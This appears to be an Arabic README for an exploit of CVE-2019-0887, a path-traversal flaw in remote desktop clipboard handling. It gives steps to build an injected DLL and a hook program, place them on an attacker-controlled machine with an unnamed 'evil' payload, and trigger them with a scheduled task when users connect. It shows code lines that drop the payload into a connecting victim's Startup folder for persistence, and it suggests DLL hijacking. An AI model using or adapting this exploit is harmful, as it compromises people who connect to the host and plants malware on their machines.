
استغلال لـ CVE-2019-0887
قم بتجميع CVE-2019-0887، وأعد تسميته إلى winhlp.dll
قم بتجميع Install_Hook، وأعد تسميته إلى hook.exe
كن حذرًا، يجب تجميعهما بإصدار x64
ثم ضعهما في النظام الخبيث على هذا النحو:
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
إذا أراد أحد تغيير المسار، فإليك الموضع:
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
ربما استخدم taskschd.msc لإنشاء خطة مهمة، وعيّن مشغِّلًا على "عند الاتصال بجلسة مستخدم" وعيّن مسار ملف hook.exe.
انتظر حتى يتصل بعض الأشخاص بنظامي الخبيث، وينسخوا شيئًا، ثم... pwn
نصيحة: لماذا لا تستخدم اختطاف DLL؟